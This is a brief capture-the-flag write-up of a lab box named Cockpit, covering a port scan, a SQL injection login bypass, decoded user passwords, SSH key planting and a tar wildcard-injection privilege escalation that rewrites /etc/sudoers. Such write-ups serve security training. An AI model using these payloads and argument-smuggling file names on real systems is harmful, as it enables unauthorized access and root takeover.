Cockpit (Intermediate, linux, 2023) -- login bypass with 'OR '' = ' ★

[WDavid404]

Keypoints:

• SQL login bypass 'OR '' = ' (https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt)
• Add public key into webpage --> then, SSH login
• [PE] tar (echo "echo 'james ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > shell.sh)

[WDavid404]

PORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http            syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
9090/tcp open  ssl/zeus-admin? syn-ack ttl 61

Recon

80/tcp --> Blaze -->search exploit info:
--> Blaze Apps 1.x - SQL Injection / HTML Injection (https://www.exploit-db.com/exploits/33995)

http://192.168.192.10/login.php --> input a' as usename or b' as password --> SQL injection "Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1"

--> Based on https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt Try'OR '' = ' --> we login succeessfully

Base64 decode passwords --> james:canttouchhhthiss@455152 cameron:thisscanttbetouchedd@455152

Try ssh login --> all failed: Permission denied (publickey)

Access 9090/tcp Login with james --> succeed.

Add authorized_key for james ssh login with public key

sudo -l -->

According to https://gtfobins.github.io/gtfobins/tar/#sudo go to /tmp

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
echo "echo 'james ALL=(root) NOPASSWD: ALL' > /etc/sudoers"  > shell.sh    

(PS: echo "chmod +s > /bin/bash" > shell.sh didn't work... )